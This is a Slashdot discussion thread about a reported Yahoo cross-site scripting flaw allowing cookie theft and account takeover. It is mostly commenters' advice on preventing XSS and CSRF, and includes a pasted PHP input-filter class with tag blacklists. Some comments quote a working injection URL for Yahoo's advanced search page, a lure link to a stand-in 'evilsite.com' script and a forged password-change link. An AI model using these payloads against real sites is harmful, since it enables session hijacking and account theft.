Yahoo! XSS Flaw Endangers its Users

Rarely Greys writes "A major Yahoo XSS flaw makes it possible to take over any Yahoo user's account, including their mail, instant messaging, photos, etc. This is not a rare occurrence. So why aren't web sites doing more to protect their users? It's looking like most web developers don't even know or care about XSS."

Responsible disclosue?

[starwed]

There's no information here about whether Yahoo has been contacted about this (and their response if so.)

Re:Responsible disclosue?

[The+Hobo]

It's a lot better for the submitter to link to his own blog post and put a personal, biased opinion on the submission instead of doing what you said. You'd think that editors would strip out such biased garbage from submissions and let, you know, the community make those statements instead of reporting them as news. Then again, it's not like they've ever cared to do that.

Re:Responsible disclosue?

[Simon+Garlick]

You seem to have forgotten that this is Slashdot. Let me break it down for you.

Google = GOOD
Yahoo = BAD

You're welcome.

Re:Responsible disclosue?

[tsa]

I think Flickr = GOOD. Now I'm confused...

Re:Responsible disclosue?

[trianglman]

Whether it was disclosed to Yahoo directly or not, it has already been fixed (at least when I tested it in Firefox). I don't know about most of the Yahoo team, but Rasmus (the same one that invented PHP) pays very close attention to site security, and Yahoo, Google, and many others watch the boards where these vulnerabilities are revealed and fix the problems, often within hours, whether its disclosed or not.

Re:Responsible disclosue?

This has been reported to bugtraq, and full disclosure, and cert with a CC to yahoo over 20 times that I've seen. They don't care.

When no one uses their services any more they'll probably do something.

http://www.google.com/search?q=yahoo+xss&ie=utf-8& oe=utf-8&aq=t&rls=org.mozilla:en-US:official&clien t=firefox-a

The only way they don't know is if they've been on a vacation to mars for the last 5 years. Any subscriber to the security lists has seen this repeated over and over and over and over and over again.

It doesn't get any more responsible. This issue has been reported like a broken record. It should have been on CNN a few weeks after it was first disclosed. It takes me all of 3 minutes to remediate a login page for XSS. The geniuses at yahoo could do it in 30 seconds if they wanted to.

I remember seeing it pop up 3 years ago.

-AC

Re:Responsible disclosue?

Rasmus and the security team had this bugged and patched within hours....because they are awesome.

I fail to see how is this related to XSS

[wumpus188]

And, if I'm reading his code right, to get this to work one must have 'third party cookies' allowed in the browser... Most sane browsers have this OFF by default.

Re:I fail to see how is this related to XSS

[phantomcircuit]

You are in fact wrong. The cookie is sent through a form which is not affected by whether third party cookies are enabled or disabled. It should be noted that this flaw has already been fixed...

Re:I fail to see how is this related to XSS

[Carewolf]

Most sane browsers have this OFF by default.

Does this include IE?

Yes, since IE6, I believe.

Re:I fail to see how is this related to XSS

[An+Elephant]

You're reading his code wrong, and third-party cookies are not required.

It's not what I would call "XSS" (those, I thought, had to do with code on one frame or tab accessing objects on another, and are therefore browser problems, not site problems); it's a JavaScript injection vulnerability. The link generated by the Ruby script, allegedly, inserts JavaScript code into a Yahoo page. This code is then executed with the same permissions as Yahoo code, and what it does is read your Yahoo cookies and submit them to some other site as request arguments.

The Perl code then parses the submitted data into cookies and pretends to be Firefox accessing Yahoo with your cookies.

Re:I fail to see how is this related to XSS

[VGPowerlord]

It's not what I would call "XSS" (those, I thought, had to do with code on one frame or tab accessing objects on another, and are therefore browser problems, not site problems)

As I understand XSS, it is any vulnerability that lets one inject code, usually javascript, into output from one site, causing data to be sent to another site. In my experience, it is usually caused by a site not filtering input correctly rather than a problem with a browser.

Re:I fail to see how is this related to XSS

[morgan_greywolf]

Yes, since IE6, I believe.

Um, no. Neither IE6 nor Firefox 2 block 3rd-party cookies by default. In IE6, one can turn off 3rd party cookies with Tools -> Internet Options -> Privacy Tab -> Advanced. Check override automatic cookie handling, and then under Third Party choose Block or Prompt.

In FF 2.0, you need to do an about:config and set network.cookie.cookieBehavior to 1.

Any questions?

Re:I fail to see how is this related to XSS

[@madeus]

Thanks for that. That's what I was thinking (that it's not really what I would have thought as being a 'cross site scripting vulnerability' - which I've always considered reserved for flaws in the way a browser lets frames/iframes/windows from different sites interact) and it was just a regular stupid-developer instance of allowing people to embed their code in the site.

I have sympathy for the cases where there are obscure workarounds developed which let people do this sort of thing despite the developer(s) taking reasonable steps to prevent it, but often (and I'm not commenting on this case specifically) developers don't even seem to try to code defensively.

The culture in companies that allows this sort of thing to happen can be a frustrating one for good developers, as when companies fail to see the value in high quality software and perceive mediocre quality software as being roughly the same suitability, the efforts of good developers are often not rewarded any better than those of less capable developers (and the companies themselves often unwittingly end up reinforcing the perception that poorly written software is just as valuable as well written software, and not realising what they are missing out on).

Re:I fail to see how is this related to XSS

[bkr1_2k]

No, most "sane" users have whatever is default, by default. Most "informed" users have this off by default, which is not the same as "sane". You can be perfectly sane and still be ignorant. Users don't care because they use their computers and email as a tool. Most don't understand how or why it works, they just want it to work, and for the most part it does.

Re:I fail to see how is this related to XSS

Hm.

Posted anonymously because god knows what kind of flames I'd get if people knew I worked for an Internet advertising company that uses third-party cookies.

IE6 has third-party cookies on by default, as does IE7, as does Firefox 2. The only "major" (not major in marketshare, but in mindshare) browser that has third-party cookies disabled by default is Safari at the moment.

On the other hand, don't believe the scare tactics that say that third-party cookies are "spyware" or some horrible conspiracy against you. They're not. They're only used to target ads... if you go to a lot of sites like BestBuy.com and not BettyCrocker.com, you'll be more likely to receive ads about tech products. That's all there is to it. Third-party cookies are harmless. (We've actually had to disappoint Apple because their own browser didn't support what they wanted to do! Hah.)

In addition, this exploit has nothing to do with third-party cookies. It uses first-party cookies, then spoofs a new session using the cookies recorded from another session. At least as far as I'm reading it... maybe I have the details wrong.

Re:I fail to see how is this related to XSS

[Licky+Lindsay]

The problem is the IT security community can't name things for shit. The term XSS has long, long, since been overloaded to mean HTML/Javascript injection problems in websites. It makes no sense but that's what people call it.

Talk about an exploit...

[C10H14N2]

What the hell are "Penis painted" bars? /Useless without pics

Re:Talk about an exploit...

[superash]

Don't act dumb. It is no longer cute.

Re:Talk about an exploit...

For fucks sake.

Please Oh Evil God Of Intenet Wankers, Memes and MySpace, let this meme die quickly.

Ouch..

[zaunuz]

I would fall into the category of developers who did not know about this threat. How would i go about protecting the users? are there any simple guidelines that would make XSS-attacks impossible?

Re:Ouch..

[Don_dumb]

I am not a web dev but I am casually learning web development and not only do I not know what XSS is (other than people mentioning it), the article doesn't actually explain what it is or how to stop such attacks. Fortunately the wikipedia page for XSS gives a (probably too) detailed description and preventative measures.

But it would be helpful for me if someone could give a brief outline.

Re:Ouch..

[Capt'n+Hector]

It's the same as preventing SQL injection. If you take a user input, escape html tags before displaying them.

Re:Ouch..

[zaunuz]

Im already doing that by default, so i guess im safe (for now!!)

Re:Ouch..

[Fireflymantis]

Not really, Are you making damn sure, all the time, without fail that if a user changes view.php?id=32 to view.php?id=33 that they are not getting access to content they shouldn't be? What about cookies? Assuming the malicious user can (and will) build cookies of their choosing and content, are you making sure that this cannot somehow be used to hijack another users account? Are you 100% certain, that every time you read get/post/put data that it has been marked as tainted, validated, and only after it has made it through some very harsh sanity checks it is allowed any where /close/ to a DB insert/query? It gets even more muddeled in the world of XmlHttprequests when you have to validate against a plethora of other constraints... I really havn't even begun to list possible attack vectors. Simply checking form data is almost 99% of the time not enough. For a non-trivial web app, even the above is not easy to do unless you pay attention to it every step of development. And even if you do that, you will probabaly miss something.

Re:Ouch..

[ensignyu]

However, you should also be aware of the related XSRF (cross-site request forgery) attack, which can actually be done from a different site. For example, someone on your site says "Hey, go to myevilsite.com", and then when you view the page it uses Javascript to auto-submit a form pointed at your site. If that form happens to be "delete account" and you don't have any protection (such as a generated form ID that only legit forms from your site would have, or requiring a password), there could be trouble.

Re:Ouch..

[zaunuz]

1. I program the serverside so that it allways assumes that the user might be tampering with the parameters, so if any parameters are combined in a way they shouldn't be, the attemt gets logged and the session is aborted.
2. I don't use cookies
3. all characters that can be used is HTML or SQL code are delimited
4. I always assume that someone might be tampering with form data.

Im not saying that my security measures are flawless, but i do take alot of things into consideration, and i am paranoid when it comes to security (heh, which is why i posted here in the first place, i guess)

Re:Ouch..

[zaunuz]

session is automaticly aborted if HTTP_REFERRER is something else than a website on my server, or the CGI-script itself. Not really a strong way of countering such attempts, but combined with alot of other smaller things that i've implemented, it has proven useful.

Re:Ouch..

[Capt'n+Hector]

We're talking about XSS, here. It IS enough to check form data and strip html tags. Whitelist DB interactions, and you're safe 99% of the time. (And that 1% is on huge sites that are worth targeting by experienced attackers who can use the methods you just mentioned.) That Yahoo was hit by XSS is a bit embarrasing, actually.

Re:Ouch..

[J0nne]

So those suckers that use personal firewalls that block/overwrite the referrer are blocked from using your site? You haven't seen 'Field blocked by Outpost firewall (http://www.agnitum.com)' anywhere in your logs?

Using the referrer logs for anything other than logging/statistics is a stupid thing to do, IMHO.

Re:Ouch..

[zaunuz]

I gotta admit that that's an issue i haven't thought of, so thanks for telling me.
Although i haven't seen anything in the logs that hints of a firewall altering the referrer yet.

Re:Ouch..

[J0nne]

Outpost alters it, but I'm certain there are some others that just block it (ie. send an empty referrer), so depending on how you wrote your site, those people might be affected too.

I personally think it's a stupid feature to add to a personal firewall, but it's there, so we have to deal with it ;).

Re:Ouch..

[Goaway]

Actually, in most sane languages, you don't have to do anything remotely similar to prevent SQL injections. It's pretty much only PHP that forces the user to hand-sanitize all input for use in SQL.

Re:Ouch..

[trianglman]

The short explanation to protect your website from this is to not display any user generated data. This includes: GET variables, POST variables, COOKIES, SERVER variables (such as REQUEST_URI, etc.) or any database stored values that may have originally come from such sources.

The best way to do this depends on the server side technology you are using. But even then, no filter is 100%. You also have to watch context. In the example here, Yahoo was filtering quotation marks, but this exploit works around that restriction.

Re:Ouch..

[nherc]

Except HTTP_REFERRER can be spoofed just as easily as the example code is spoofing the User Agent so that the Yahoo script thinks the request is from a browser and not another script. If I was testing this vulnerability, I'd certainly test if it was indeed looking at the Referrer by spoofing it as well, IF my initial code didn't work, but since it's so trivial to beat it appears Yahoo doesn't even bother.

Re:Ouch..

[zaunuz]

3 perl 3

Re:Ouch..

[Goaway]

Welcome to input sanitation, Slashdot style!

Re:Ouch..

[zaunuz]

hehe, that's the only thing i hate about my job: i have to develop the sollutions so that it work with the strangest software (I.E. is paain) just because it's common.. anyhoo, this is getting offtopic..

Re:Ouch..

[oglueck]

This is easily prevented by using request tokens.

1. /deleteAccount displays a confirmation form that contains a generated token value in a hidden field
2. User submits the form to /deleteAccount including the token
3. Server validates if token matches the handed out value

An external site would have to hijack the session cookie to forge such a request. But then it could do anything anyway.

Re:Ouch..

[Licky+Lindsay]

While there is good advice here, the fact that people find themselves in the position using Slashdot as the place to learn this stuff, says that the state of security awareness in the web development "industry" is poor. Assuming that the developers who are ignorant of all this are newer or less experienced developers, the company they work for should train you about this stuff when they hire you. Otherwise they work for a sucky company. If you are on your own working freelance, not part of a software company, it's a dog eat dog world out there my friends you better be prepared.

Re:Ouch..

[Trails]

(probably too) detailed description

Bull. Spreading knowledge about attack vectors is the best way to stop them. Keeping them all secret is asking for trouble.

Stopping it is essentially as follows: never assume trust of anything in the request. Validate sessions against at least B-class ip (this will accomodate the AOL'ers, it's not perfect, but it makes the exposure smaller), white list allowed urls and parameter values (as opposed to blacklisting, which leaves one prone to forgetting something), enforce strict workflow, never expect that javascripts have executed, and keep in mind that it's fairly trivial to craft HTTP requests.

In a web app, the only thing one controls as a developer is what executes on the server. Never fall into the fallacy of believing that you're sending "instructions" to the client, they're more like suggestions, e.g. pretty please with sugar on top render this bold.

Re:Ouch..

The simplest solution to XSS is to not allow HTML/XHTML tags in user input, This limits the user from putting in their own eye candy but its the easiest safe way to do it. In PHP use the htmlentities() or htmlspecialchars()functions, either one will convert the less than and greater than signs to valid html, also do not allow the string '&#' and your done.

The reason for not allowing the '&#' string is that it give the user a way to represent characters as hex or numereric values, I dont think the php functions I mentioned above catches these.

If you must let users put in their own tags thats when it gets complicated.

Re:Ouch..

[protohiro1]

Every major site has XSS vulnerabilities. They are inevitable. You have remember that large applications can have hundreds of developers working on many, many lines of code. It is hard to hit every edge/corner case for every possibility, while still preserving functionality. Many, many sites can be hit with this (even yours actually, look into vulnerabilities with the Expect: header)

Re:Ouch..

D'oh, that's embarassing: ouch

Re:Ouch..

Whatchew talkin' 'bout, Willis? PHP has prepared statements. If you're not using them and instead are building your query strings by concatenating a bunch of random, user-supplied crap, shame on you!

Re:Ouch..

[Goaway]

PHP 5, maybe. Which is not all that widespread yet. And it still has the old, horrible interfaces sitting right there, and all tutorials and all the code people copy-paste use them.

It wasn't designed right from the start, and it will take a very, very long time to undo the damage.

Re:Ouch..

[Don_dumb]

Calm down.
I meant that the wiki page was probably too detailed for more novice web types like myself. There is nothing wrong with detail, the wiki is fine. I would just have liked a laymans outline of the technique and its prevention. Which is why I asked for one here, thanks for the reply.

Not necessarily that they don't try.

[Fireflymantis]

As a web developer myself, I try dillagently to kill off any XSS attacks by writing good secure code, but there will always be a few corner cases in any non-trivial application that one does not count for. This is doubly so when dealing with web services that have to pump out huge amounts of data over an insecure medium.

What is most showing is how fast it will be till Yahoo fixes this vunerability as a sign of their metal.

imho...

Re:Not necessarily that they don't try.

[jc42]

As a web developer myself, I try dillagently to kill off any XSS attacks by writing good secure code, ...

As a web user myself, I try diligently to kill off any XSS attacks by turning off all client-side scripting, using NoScript, etc.

Unfortunately, I'm also a web developer, and I need to test my stuff against all the common browsers. So I have to occasionally use browsers (you know which ones I'm talking about) that don't allow user control of all client-side scripting.

In a sane world, there would be no such browsers. We don't live in that world, unfortunately. But for my personal browsing, I can use only the sane browsers.

Re:Not necessarily that they don't try.

[Blakey+Rat]

Just FYI:

metal |?metl| noun 1 a solid material that is typically hard, shiny, malleable, fusible, and ductile, with good electrical and thermal conductivity (e.g., iron, gold, silver, copper, and aluminum, and alloys such as brass and steel) : vessels made of ceramics or metal | being a metal, aluminum readily conducts heat. Heraldry gold and silver (as tinctures in blazoning). 2 Brit. (also road metal) broken stone for use in making roads. 3 molten glass before it is blown or cast. 4 heavy metal or similar rock music.

mettle |?metl| noun a person's ability to cope well with difficulties or to face a demanding situation in a spirited and resilient way : the team showed their true mettle in the second half.

Why web developers don't care about XSS

[laffer1]

Could it be that web developers have to create Web 2.0 applications that take all sorts of evil input? How do you make blogs, tags, message boards, and things 100% safe? I wish security researchers would create a proof of concept site that was a REAL web application to show best practices. Sure there are projects like http://www.owasp.org/, but their example code is near useless for most languages they have up.

Think about the input needed for a comment box. You have to deal with i18n issues. UTF-8 or UTF-16 is a very big character set. You can't explicitly block everything and then white list selectively very easily with such a big character set.

Some people think bbcode is the solution for some types of sites. I haven't seen too many implementations of bbcode for languages other than PHP that are open source and reusable.

Can someone point me at resources for Java and .NET development? I don't use PHP very often. Are there any resources for other languages like perl, python and ruby?

I'd personally love to get a library to do safe HTML input while stripping any dangerous tags in Java that is reasonably reusable.

Re:Why web developers don't care about XSS

/** @class: InputFilter (PHP5-Strict with comments)
* @project: PHP Input Filter
* @date: 10-05-2005
* @version: 1.2.2_php5
* @author: Daniel Morris
* @contributors: Gianpaolo Racca, Ghislain Picard, Marco Wandschneider, Chris Tobin and Andrew Eddie.
* @copyright: Daniel Morris
* @email: dan@rootcube.com
* @license: GNU General Public License (GPL)
*/

class objFilter {
protected $tagsArray; // default = empty array
protected $attrArray; // default = empty array

protected $tagsMethod; // default = 0
protected $attrMethod; // default = 0

protected $xssAuto; // default = 1
protected $tagBlacklist = array('applet', 'body', 'bgsound', 'base', 'basefont', 'embed', 'frame', 'frameset', 'head', 'html', 'id', 'iframe', 'ilayer', 'layer', 'link', 'meta', 'name', 'object', 'script', 'style', 'title', 'xml');
protected $attrBlacklist = array('action', 'background', 'codebase', 'dynsrc', 'lowsrc'); // also will strip ALL event handlers

/**
* Constructor for inputFilter class. Only first parameter is required.
* @access constructor
* @param Array $tagsArray - list of user-defined tags
* @param Array $attrArray - list of user-defined attributes
* @param int $tagsMethod - 0= allow just user-defined, 1= allow all but user-defined
* @param int $attrMethod - 0= allow just user-defined, 1= allow all but user-defined
* @param int $xssAuto - 0= only auto clean essentials, 1= allow clean blacklisted tags/attr
*/
public function __construct($tagsArray = array(), $attrArray = array(), $tagsMethod = 0, $attrMethod = 0, $xssAuto = 1) {
// make sure user defined arrays are in lowercase
for ($i = 0; $i < count($tagsArray); $i++) $tagsArray[$i] = strtolower($tagsArray[$i]);
for ($i = 0; $i < count($attrArray); $i++) $attrArray[$i] = strtolower($attrArray[$i]);
// assign to member vars
$this->tagsArray = (array) $tagsArray;
$this->attrArray = (array) $attrArray;
$this->tagsMethod = $tagsMethod;
$this->attrMethod = $attrMethod;
$this->xssAuto = $xssAuto;
}

/**
* Method to be called by another php script. Processes for XSS and specified bad code.
* @access public
* @param Mixed $source - input string/array-of-string to be 'cleaned'
* @return String $source - 'cleaned' version of input parameter
*/
public function process($source) {
// clean all elements in this array
if (is_array($source)) {

Re:Why web developers don't care about XSS

[Fireflymantis]

A link to the source document would probably have been a lot more helpfull. It's no longer cute to act dumb.

Re:Why web developers don't care about XSS

[Goaway]

BBcode is ugly, cryptic and pointless. It's just as hard to use for users as HTML, so nothing is gained on that side, and if you're parsing something that's largely equivalent to HTML, why not just parse HTML in the first place? There's nothing magic about BBcode, and you could just as well replace the BBcode tags with HTML tags in your parser and have the same level of security (judging by the number of XSS exploits found in various BBcode implementations, not all that much, really) but with slightly more familiar markup.

Re:Why web developers don't care about XSS

Zope 3. Seriously. Full unicode, everything is security proxied, content is fully protected per attribute per user per permission, even if you made a page which tried to show non-accessible data, it wouldn't let you. All form data, user input, URLs, etc are escaped automatically. Oh for user-input use some text markup which gets converted to HTML. Users dont need to write javascript on their blog directly.

Yes it has a steep learning curve. But once you get it going, you will laugh at PHP/ASP and similar solutions. It is so far ahead it is not even funny.

Re:Why web developers don't care about XSS

[brunascle]

one way to do it: only allow 100% valid XHTML (and thus, XML). when it's being uploaded, send it into an XML parser, then it's quite easy to find malicious tags (like script or iframe). just iterate through the document tree. if everything's ok, print the XML document back out to a string again and save that copy, not the copy the user uploaded.

Re:Why web developers don't care about XSS

[brunascle]

i actually wrote code in C# that does just this (and gets rid of/replaces unallowed tags), but unfortunately my employer owns it :-/

Re:Why web developers don't care about XSS

file://c:/www/includes/objFilter.inc

Re:Why web developers don't care about XSS

[Sancho]

Something like BBcode would be just fine. The problem with HTMl/XML is that you can embed script in many, many tags. Validating each of these is a chore. Worse, some browsers might have bugs which allow script in tags you wouldn't expect.

With BBcode-like tags, you strip all HTML tags, period. They're either quoted so that they show up as raw text, or they are removed entirely. But the magic BBcode tags are transformed into HTML. [b] becomes <b>, [/b] becomes </b>. [b script=blah] is malformed and removed.

The problem comes when they try to get too clever. They basically start re-implementing HTML, which leads to greater abstraction. At this point, they might be better off parsing HTML, except for the fact that they control BBcode. HTML can change, browsers can implement it incorrectly, but you control your own strange tags, and how they map to actual HTML.

Re:Why web developers don't care about XSS

[Goaway]

You missed the point - why parse [b] into , when you could parse into , and discard as invalid?

Re:Why web developers don't care about XSS

[Sancho]

I guess that would work, but restricting HTML to a limited subset seems somehow worse than creating a new markup. As a user, how do I know which options to a given HTML tag are allowed? As a web programmer, how do I know whether script is embeddable in some of those options for any given random browser that people might use? (Opera? What's that? Safari? I don't have a Mac (ok, Apple addressed this one)).

For the user who is familiar with HTML, BBcode-alikes provide a visual cue to differing semantics. If I know that I'm allowed to create an anchor tag, for example, I might think that I'm allowed to style it, too. Or create an onmouseover event for it. If, instead, I create a [a] tag or a [url] tag, I don't come to the site with preconceived notions about what I might be able to do.

For the web programmer, I don't have to worry about browser differences. I don't have to worry that something slipped through the cracks, or that a different character set allowed code to get through, or any of the other user-input trickery could have occurred. If my script doesn't output user-submitted HTML, and doesn't output script, then I know definitively that I'm safe.

Re:Why web developers don't care about XSS

[Goaway]

It's easy enough to put a "Allowed HTML:" list somewhere. Lots of sites do that, and I don't think anybody has problems with that.

And you don't really get any of the benefits you mention: BBcode maps nearly 1:1 to a subset of HTML. You can largely just replace BBcode tags with HTML ones in your code, and you get the same thing, only more friendly to people who are more likely to be familiar with HTML.

You don't output user-submitted HTML at all. You first parse HTML, and then you output your own HTML. You use the exact same kind of engine you would for BBcode. Any vulnerabilities the HTML version would have (and I don't deny it could have them), the BBcode version would be just as likely to have (and this happens).

Idiot Consumers?

[Belacgod]

If I read right, you have to click on a long link, whose destination is nonobvious, to activate this. That restricts this, like most other internet security threats, to the (multitudes of) total idiots. Am I reading TFA wrong?

Re:Idiot Consumers?

[Fireflymantis]

more correctly (If I read the overly pink article right), it is the reliance that someone will click on something like this:

----
OMG! Check out this funny search!

"French military victories"
<a href='evilsite.com/haxzoryouryahoo.cgi'>http://sea rch.yahoo.com/search?p=french+military+victories$l t;/a>

HAHAHA! Couldn't stop laughing...
----

Re:Idiot Consumers?

Yeah, but there are a lot of ways to convincingly disguise such links, particularly on the HTML trainwreck that is MySpace. The click could be on what appears to be a picture thumbnail, or even anywhere on the screen (giant transparent image ...)

Re:Idiot Consumers?

Put the link in an invisible iframe, and the user doesnt notice anything.

Re:Idiot Consumers?

More likely, it's something like

Our technicians at yahoo.com have detected illegal activity from this account. Please
<a href="http://account.yahoo.com/newpass.cgi?newpass =haxx0r&newpass2=haxx0r">read our terms and services</a> and ensure that all future activity adheres to the permitted activities listed therein, or your account will be terminated.

Web developers know not enough about security

[PsyQo]

In my opinion web developers just don't know enough about security.

They know how to store and retrieve data from a database, but they don't know why it's important to escape strings before they go to into a SQL query (or better: use parameterized queries). It happens too often that when you see some page: view.php?id=23 and you change 23 to 23', it returns an error. Although a lot of developers are 'saved' by PHP's magic quotes, it isn't a silver bullet.

Even less web developers seem to know about XSS and how to prevent it.

Web security should get a lot more attention in web developer education, from SQL injection to XSS to salted hashes.

Re:Web developers know not enough about security

[huge]

If you want to avoid SQL injection in PHP, one option is to use PDO and especially PDO->Prepare() and PDOStatement->Execute(). Again, not the silver bullet but easy and consistent way to handle weird user input.

Re:Web developers know not enough about security

[Photon+Ghoul]

I don't think it's a matter of education as much is it's a matter of developers not caring. At least from my experience...

Re:Web developers know not enough about security

[SolitaryMan]

Even less web developers seem to know about XSS and how to prevent it.

When I read the article, the guy almost had me convinced that the world is about to end. The sun seemed to be falling from the sky and so on.

When I read the exploit, however, I found it to be really trivial. And trivial to fix. First: how dare yahoo to execute on the page the script that is came from the user in the request ("onerror" parameter in the link)! Second: he has stolen the cookies via "document.cookies" the easiest way to fix this is to make all cookies (at least important ones) HTTPOnly

Re:Web developers know not enough about security

[Blakey+Rat]

There are a lot of developers:

1) Some are entirely ignorant of these issues, and will code things like (say) a cookie that says "admin=true" to determine admin access.

2) Some are aware of the issues, but don't care to implement them. At least not until it's reported to them by a user/client/boss.

3) Some are aware of the issues, would like to implement them, but their clients/bosses don't give them enough time or resources to do so.

Re:Web developers know not enough about security

[SolitaryMan]

Oops! Just noticed that my link leads to the general HTTP cookies article. Here is the more on topic article about usage of HTTP-only flag

I'd care less if it was site developers problem...

[zukinux]

The real problems today are using ActiveX in Internet Explorer.
Believe it or not, most malware,spyware,viruses spread to the user via Internet Explorer ActiveX.

Although users are prompted to click yes or no, the default user will click yes anyway, and that's even a bigger problem.

Use some library/package or something

[cerberusss]

It's not a shame to admit you know zilch about XSS. But at least use a library/package/class or something which prevents these flaws. For instance for the PHP developers, there is HTML_Form, which includes a unique hidden form field each time a form is generated thus preventing some XSS.

Re:Use some library/package or something

[spectrokid]

The project you point to has a stable release > two years old and a white screen under "roadmap". Isn't this a big part of the problem: security should (specially for small deployments) be largely of the shelf, based on good toolkits, but it is not considered "sexy" to program these (parts of the) toolkits? I mean, how many ways are there to present a form on a website? It shouldn't be rocket technology to make one that says: "make sure the user entered a valid date here before throwing it on the database". That validation should be part of the toolkit, not left to homebrew hacking.

Re:Use some library/package or something

[cerberusss]

I totally agree, presenting forms should be part of the toolkit. And exactly because it's not rocket science, this toolkit is quite stable and hasn't changed the last two years; it's not like XSS is anything new.

What HTML_Forms does, is the following:

• You describe the form including validation rules, with easy to use HTML_Forms functions
• Then that description is used for both printing the form as well as checking a submitted form

Works flawlessly and integrates with the templating classes that PEAR offers.

Re:Use some library/package or something

[shiflett]

The safeguard you're describing protects against CSRF and has nothing to do with XSS.

Re:Use some library/package or something

[cerberusss]

I accidentally linked to HTML_Form instead of HTML_QuickForm. It will automatically quote your values so as to stop XSS and will also make sure that magic_quotes_gpc isn't corrupting your values.

Here's Why.

Well, my take (multiple major webdev projects on the go NOW)...

1. MOVING TARGET

A lot of webdev security issues (DB input, etc.) are moving targets.

For example, take database input. Ten years ago, for many (beginning) developers, escaping quotes and backslashes manually was considered fine. Later developers had database libraries that provided these functions natively. All of a sudden, unicode came along. Suddenly you had to worry about extra characters. This was another step - for example, for developers using MySQL, it was pertinent to change all of your escape functions to a new, unicode-aware one.

With everything else on their plate, even if they're single-language developers, auditing old code to maintain current security best practice falls somewhere at the bottom of the todo list, between 'get some exercise' and 'catch up on sleep'.

2. EXPECTATIONS RISING

As individual leading sites like google's gmail or google earth appear, expectations from clients increase. Web developers have a hard time keeping up with meeting all of the new 'standard features' that are expected, and are often implementing certain aspects for the first time, relying on either poorly audited code (random downloaded scripts) or writing their own with insufficient time for testing and security auditing.

3. NEW OR RAPIDLY ELEVATED ISSUES IN WEB SECURITY

In the last ten years, issues have appeared such as:
  1. Public tools and worms that can easily attack custom-made applications, rendering some older, unmaintained code more readily exploitable. (This is just another time pressure, and security is all about the combination of resources for the attacker and defender... not just technical know-how on either side.)

  2. Cross site scripting... this is quite a complex issue and is not understood by all developers.

  3. A large number of scripting languages, which are constantly being updated and take a lot of time to stay up to date with. For example, most web developers are not really competent with javascript/ecmascript...

  4. Browser or other 'out of web developer control' bugs can make different tags or features dangerous 'at short notice'.

  5. AJAX and web services, which emphasise providing structured, easily-accessible data to the public, make data scraping (ala screen scraping) that much more of a real and widespread threat. As of today, most developers still do not take this threat seriously.

  6. Denial of service attacks.

  7. New expectations of server-side image (or web services data) processing can expose extra code (often legacy tools, or tools in entirely new languages) to potentially hostile input.

4. GENERAL PROGRAMMING ISSUES

Add to the above the standard pressures that lead to security shortfalls:
  - Web developers, like other programmers, are often lumbered with unrealistic delivery timeframes.

  - A lot of webdev is single-developer stuff, not completed in teams. As only one person reads the code, errors are less likely to be spotted.

  - Most webdev projects have no budget for code auditing as close-to-secure code is often merely a desirable part of the overall bundle, not a steadfast client requirement...

  - Webdev people often aren't client facing. In today's highly comepetitive webdev market, client facing salespeople perhaps don't know enough about code security to sell it as a budget-worthy extra.

5. CLIENTS DONT CARE

They want a working site, not a working site with n^m behind-the-scenes feelgood features they have to take at face value and have no way to 'see', 'show the boss' or otherwise justify.

Re:Here's Why.

[Riquez]

Very well put, you should've logged in because you deserve the karma for this more than most.

I particularly empathise with #4.
Unrealistic deadlines: I'm often asked to complete a job that should take 8-10 days in 3. Even then, my 10 day estimate is not including high-level security features. When you explain "if I do it in 3 days, & you want it changed later I'll have to start again from scratch. Plus, it will be minimum security - please understand that the website *may* be raped" THEY say "Bahh, don't confuse the issue, just get it done as quick as possible"

Single Developers: I live in a fairly remote location, there are very few people to share ideas/problems with. I try to be as creative as possible, but in past experience nothing helps more than a good old chat about reg-ex & mod_rewrite over a coffee & sandwich.

Perhaps the smaller business has somewhat of an excuse, but Yahoo! was pretty big last time I checked - if they overlook XSS, what chance do the rest of us have?

Re:Here's Why.

[tokul]

For example, take database input. Ten years ago, for many (beginning) developers, escaping quotes and backslashes manually was considered fine. Later developers had database libraries that provided these functions natively. All of a sudden, unicode came along. Suddenly you had to worry about extra characters. This was another step - for example, for developers using MySQL, it was pertinent to change all of your escape functions to a new, unicode-aware one.

Since when some 8bit character can mean same thing as standard ASCII quote or apostrophe? If database uses 8bit characters as alternative escapes, database must be fixed and not application which uses it. Stop learning from Microsoft Internet Explorer Team.

Re:Here's Why.

[strider44]

Actually in my (short) experience as a security researcher and pen tester with a programming background it's usually more that the programmers or web developers simply aren't aware of the security risks. You can go on about client pressures and such, and they're valid, but for all input based attacks on web applications these attacks can usually be simply avoided by using standard functions or by taking the fifteen seconds it would take to validate the input.

The problem is that the developers don't know that they have to or that they should. They don't know about injection vulnerabilities, or that even if it's a drop down list some attacker can send whatever they want to the server. They never learned about security issues at university or when teaching themselves programming, and they've never been caught out on security issues.

I'd say above 90% of security issues aren't caused by accidentally forgetting to validate an input or because the developers are too busy to do it or even that the developers haven't been up with the latest security research and it's a really new attack being used, but just because the developers aren't security aware.

Re:Here's Why.

[cerberusss]

About the single developer point; I suggest good old IRC as a semi-replacement for the coffee chat. OK it's not good, but it's better than nothing. The trick would be to find a decent channel. Freenode offers some good ones.

XSS?

[bar-agent]

What's XSS?

Eh, never mind. I don't really care.

Re:XSS?

[RuBLed]

so do I... but what I really care about is that the blog lacks Cute Ponies 2.0 (tm)

Not so sane or OFF in Firefox 2

[Alcoholic+Synonymous]

Firefox 2 changed the way the cookie preferences worked. You can only choose to allow or disallow all cookies through the options menu. To actually block just 3rd party cookies the way you could in 1.5, you have to fool around with obscure about:config settings.

Set network.cookie.cookieBehavior to "1"

http://kb.mozillazine.org/Network.cookie.cookieBeh avior

Re:Not so sane or OFF in Firefox 2

[HeroreV]

Apparently Mozilla believes in the GNOME ideals of UI design: It's better to hide functionality than expose users to something they might not understand. If you give users an option, they'll always chose the wrong one. It's better to just make the decision for them.

Re:Not so sane or OFF in Firefox 2

[angrykeyboarder]

That's precicely why I prefer KDE to GNOME. As Linus Torvalds once said (to paraphrase) "GNOME treats uers like idiots".

And with that said, I'm off to add my $.02 to Mozilla's Bugzilla...

Oh... and NoScript...

[Alcoholic+Synonymous]

The NoScript addon has Yahoo as one of their exemptions to its anti-XSS protection by default.

Re:Oh... and NoScript...

[Giorgio+Maone]

The Yahoo search exception is ^http://([a-z]*)\.?search\.yahoo\.com/search(?:\?| /\1\b) and does not match any known vulnerable URL.

The (formerly) vulnerable page is the advanced search configuration form:

http://search.yahoo.com/web/advanced?ei=UTF-8&p=%2 2%3E%3Cimg%20src=14%20onerror=alert(String.fromCha rCode(88,83,83))%3E&y=Search&fr=yfp-t-501

